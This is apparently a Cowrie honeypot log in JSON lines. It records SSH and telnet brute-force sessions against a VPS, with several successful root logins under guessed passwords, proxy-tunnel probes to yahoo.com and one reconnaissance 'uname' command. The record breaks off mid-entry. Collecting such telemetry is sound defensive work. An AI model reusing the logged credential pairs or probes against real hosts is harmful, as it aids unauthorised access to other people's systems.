{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T14:41:20.259248Z","src_ip":"213.209.150.239","session":"f4130df6f706"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:41:20.541665Z","src_ip":"213.209.150.239","session":"f4130df6f706"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":9397,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:9397","sensor":"my-vps","timestamp":"2025-08-26T14:41:20.599221Z","session":"f4130df6f706"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T14:41:20.655842Z","src_ip":"213.209.150.239","session":"f4130df6f706"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":28816,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:28816","sensor":"my-vps","timestamp":"2025-08-26T14:41:20.811024Z","session":"f4130df6f706"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T14:41:20.867702Z","src_ip":"213.209.150.239","session":"f4130df6f706"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:41:20.925141Z","src_ip":"213.209.150.239","session":"f4130df6f706"}
{"eventid":"cowrie.session.connect","src_ip":"221.164.185.126","src_port":57146,"dst_ip":"1.2.3.4","dst_port":23,"session":"89f9cb5a8efd","protocol":"telnet","message":"New connection: 221.164.185.126:57146 (1.2.3.4:23) [session: 89f9cb5a8efd]","sensor":"my-vps","timestamp":"2025-08-26T14:42:09.146931Z"}
{"eventid":"cowrie.session.closed","duration":35.02666997909546,"message":"Connection lost after 35 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:42:44.173532Z","src_ip":"221.164.185.126","session":"89f9cb5a8efd"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51752,"dst_ip":"1.2.3.4","dst_port":22,"session":"b503777b6f28","protocol":"ssh","message":"New connection: 217.72.205.35:51752 (1.2.3.4:22) [session: b503777b6f28]","sensor":"my-vps","timestamp":"2025-08-26T14:43:30.166608Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:43:30.167942Z","src_ip":"217.72.205.35","session":"b503777b6f28"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":30845,"dst_ip":"1.2.3.4","dst_port":22,"session":"f83f81aaa03e","protocol":"ssh","message":"New connection: 212.227.235.229:30845 (1.2.3.4:22) [session: f83f81aaa03e]","sensor":"my-vps","timestamp":"2025-08-26T14:44:52.705141Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:44:52.706384Z","src_ip":"212.227.235.229","session":"f83f81aaa03e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":31205,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f3f8b4ef335","protocol":"ssh","message":"New connection: 212.227.235.229:31205 (1.2.3.4:22) [session: 0f3f8b4ef335]","sensor":"my-vps","timestamp":"2025-08-26T14:44:52.805583Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:44:52.808501Z","src_ip":"212.227.235.229","session":"0f3f8b4ef335"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T14:44:52.935359Z","src_ip":"212.227.235.229","session":"0f3f8b4ef335"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:44:53.453336Z","src_ip":"212.227.235.229","session":"0f3f8b4ef335"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T14:44:53.584060Z","session":"0f3f8b4ef335"}
{"eventid":"cowrie.session.connect","src_ip":"112.167.126.78","src_port":54818,"dst_ip":"1.2.3.4","dst_port":23,"session":"695e616602bf","protocol":"telnet","message":"New connection: 112.167.126.78:54818 (1.2.3.4:23) [session: 695e616602bf]","sensor":"my-vps","timestamp":"2025-08-26T14:45:58.517127Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40656,"dst_ip":"1.2.3.4","dst_port":23,"session":"d5599af03b80","protocol":"telnet","message":"New connection: 212.227.125.160:40656 (1.2.3.4:23) [session: d5599af03b80]","sensor":"my-vps","timestamp":"2025-08-26T14:46:00.330642Z"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:46:02.809255Z","src_ip":"212.227.235.229","session":"0f3f8b4ef335"}
{"eventid":"cowrie.session.closed","duration":31.033308029174805,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:46:31.363886Z","src_ip":"212.227.125.160","session":"d5599af03b80"}
{"eventid":"cowrie.session.closed","duration":36.383498191833496,"message":"Connection lost after 36 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:46:34.900538Z","src_ip":"112.167.126.78","session":"695e616602bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59726,"dst_ip":"1.2.3.4","dst_port":23,"session":"f8ec7b8dc6f7","protocol":"telnet","message":"New connection: 212.227.125.160:59726 (1.2.3.4:23) [session: f8ec7b8dc6f7]","sensor":"my-vps","timestamp":"2025-08-26T14:46:44.463619Z"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":50672,"dst_ip":"1.2.3.4","dst_port":23,"session":"d3e326b8f153","protocol":"telnet","message":"New connection: 123.31.39.100:50672 (1.2.3.4:23) [session: d3e326b8f153]","sensor":"my-vps","timestamp":"2025-08-26T14:46:47.895347Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40797,"dst_ip":"1.2.3.4","dst_port":23,"session":"305ef846ee80","protocol":"telnet","message":"New connection: 212.227.125.160:40797 (1.2.3.4:23) [session: 305ef846ee80]","sensor":"my-vps","timestamp":"2025-08-26T14:46:48.937128Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34460,"dst_ip":"1.2.3.4","dst_port":23,"session":"1aae88a29a45","protocol":"telnet","message":"New connection: 212.227.125.160:34460 (1.2.3.4:23) [session: 1aae88a29a45]","sensor":"my-vps","timestamp":"2025-08-26T14:46:49.779673Z"}
{"eventid":"cowrie.session.closed","duration":13.15294623374939,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:46:57.616487Z","src_ip":"212.227.125.160","session":"f8ec7b8dc6f7"}
{"eventid":"cowrie.session.connect","src_ip":"221.157.196.36","src_port":40740,"dst_ip":"1.2.3.4","dst_port":23,"session":"876d92450be7","protocol":"telnet","message":"New connection: 221.157.196.36:40740 (1.2.3.4:23) [session: 876d92450be7]","sensor":"my-vps","timestamp":"2025-08-26T14:47:10.538278Z"}
{"eventid":"cowrie.session.closed","duration":29.448548555374146,"message":"Connection lost after 29 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:47:19.228118Z","src_ip":"212.227.125.160","session":"1aae88a29a45"}
{"eventid":"cowrie.session.closed","duration":47.180277824401855,"message":"Connection lost after 47 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:47:35.075555Z","src_ip":"123.31.39.100","session":"d3e326b8f153"}
{"eventid":"cowrie.session.closed","duration":47.16322946548462,"message":"Connection lost after 47 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:47:36.100259Z","src_ip":"212.227.125.160","session":"305ef846ee80"}
{"eventid":"cowrie.session.closed","duration":30.530341386795044,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:47:41.068521Z","src_ip":"221.157.196.36","session":"876d92450be7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44064,"dst_ip":"1.2.3.4","dst_port":23,"session":"4cd44d60bfd7","protocol":"telnet","message":"New connection: 212.227.125.160:44064 (1.2.3.4:23) [session: 4cd44d60bfd7]","sensor":"my-vps","timestamp":"2025-08-26T14:48:39.761566Z"}
{"eventid":"cowrie.session.closed","duration":30.623024463653564,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:49:10.384497Z","src_ip":"212.227.125.160","session":"4cd44d60bfd7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59953,"dst_ip":"1.2.3.4","dst_port":23,"session":"361df7a4d919","protocol":"telnet","message":"New connection: 212.227.235.229:59953 (1.2.3.4:23) [session: 361df7a4d919]","sensor":"my-vps","timestamp":"2025-08-26T14:49:33.907074Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48918,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3e28d21a0ae","protocol":"ssh","message":"New connection: 212.227.235.229:48918 (1.2.3.4:22) [session: a3e28d21a0ae]","sensor":"my-vps","timestamp":"2025-08-26T14:49:42.342395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:49:43.062126Z","src_ip":"212.227.235.229","session":"a3e28d21a0ae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T14:49:43.062957Z","src_ip":"212.227.235.229","session":"a3e28d21a0ae"}
{"eventid":"cowrie.session.closed","duration":12.247522592544556,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:49:46.154492Z","src_ip":"212.227.235.229","session":"361df7a4d919"}
{"eventid":"cowrie.login.success","username":"root","password":"19861987","message":"login attempt [root/19861987] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:49:47.938900Z","src_ip":"212.227.235.229","session":"a3e28d21a0ae"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:49:48.913148Z","src_ip":"212.227.235.229","session":"a3e28d21a0ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33236,"dst_ip":"1.2.3.4","dst_port":23,"session":"fd5cf5bab5d7","protocol":"telnet","message":"New connection: 212.227.125.160:33236 (1.2.3.4:23) [session: fd5cf5bab5d7]","sensor":"my-vps","timestamp":"2025-08-26T14:50:01.586607Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33252,"dst_ip":"1.2.3.4","dst_port":23,"session":"f9b98b900d7a","protocol":"telnet","message":"New connection: 212.227.125.160:33252 (1.2.3.4:23) [session: f9b98b900d7a]","sensor":"my-vps","timestamp":"2025-08-26T14:50:02.592808Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63702,"dst_ip":"1.2.3.4","dst_port":22,"session":"273879a2beb4","protocol":"ssh","message":"New connection: 217.72.205.35:63702 (1.2.3.4:22) [session: 273879a2beb4]","sensor":"my-vps","timestamp":"2025-08-26T14:50:04.827274Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:50:04.828399Z","src_ip":"217.72.205.35","session":"273879a2beb4"}
{"eventid":"cowrie.session.closed","duration":31.53938579559326,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:50:33.125908Z","src_ip":"212.227.125.160","session":"fd5cf5bab5d7"}
{"eventid":"cowrie.session.closed","duration":30.777433156967163,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:50:33.370128Z","src_ip":"212.227.125.160","session":"f9b98b900d7a"}
{"eventid":"cowrie.session.connect","src_ip":"43.134.41.225","src_port":57292,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7dda7cf09c8","protocol":"ssh","message":"New connection: 43.134.41.225:57292 (1.2.3.4:22) [session: f7dda7cf09c8]","sensor":"my-vps","timestamp":"2025-08-26T14:50:49.568851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:50:49.569794Z","src_ip":"43.134.41.225","session":"f7dda7cf09c8"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T14:50:49.814450Z","src_ip":"43.134.41.225","session":"f7dda7cf09c8"}
{"eventid":"cowrie.session.connect","src_ip":"182.226.132.190","src_port":48749,"dst_ip":"1.2.3.4","dst_port":23,"session":"c79b740945f8","protocol":"telnet","message":"New connection: 182.226.132.190:48749 (1.2.3.4:23) [session: c79b740945f8]","sensor":"my-vps","timestamp":"2025-08-26T14:50:50.497084Z"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:50:57.569551Z","src_ip":"43.134.41.225","session":"f7dda7cf09c8"}
{"eventid":"cowrie.session.closed","duration":120.0019862651825,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:52:50.498986Z","src_ip":"182.226.132.190","session":"c79b740945f8"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":43260,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3863bae57a7","protocol":"ssh","message":"New connection: 193.32.162.145:43260 (1.2.3.4:22) [session: e3863bae57a7]","sensor":"my-vps","timestamp":"2025-08-26T14:53:16.793367Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:53:16.794371Z","src_ip":"193.32.162.145","session":"e3863bae57a7"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T14:53:16.824330Z","src_ip":"193.32.162.145","session":"e3863bae57a7"}
{"eventid":"cowrie.login.success","username":"root","password":"solana","message":"login attempt [root/solana] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:53:16.916262Z","src_ip":"193.32.162.145","session":"e3863bae57a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:53:17.039306Z","src_ip":"193.32.162.145","session":"e3863bae57a7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T14:53:17.039985Z","src_ip":"193.32.162.145","session":"e3863bae57a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:53:17.071038Z","src_ip":"193.32.162.145","session":"e3863bae57a7"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:53:17.072124Z","src_ip":"193.32.162.145","session":"e3863bae57a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44119,"dst_ip":"1.2.3.4","dst_port":23,"session":"e36f1bc54f0a","protocol":"telnet","message":"New connection: 212.227.125.160:44119 (1.2.3.4:23) [session: e36f1bc54f0a]","sensor":"my-vps","timestamp":"2025-08-26T14:53:26.730892Z"}
{"eventid":"cowrie.session.closed","duration":30.45499849319458,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:53:57.185813Z","src_ip":"212.227.125.160","session":"e36f1bc54f0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":26768,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f884592997c","protocol":"ssh","message":"New connection: 212.227.235.229:26768 (1.2.3.4:22) [session: 3f884592997c]","sensor":"my-vps","timestamp":"2025-08-26T14:56:19.970043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T14:56:19.970872Z","src_ip":"212.227.235.229","session":"3f884592997c"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 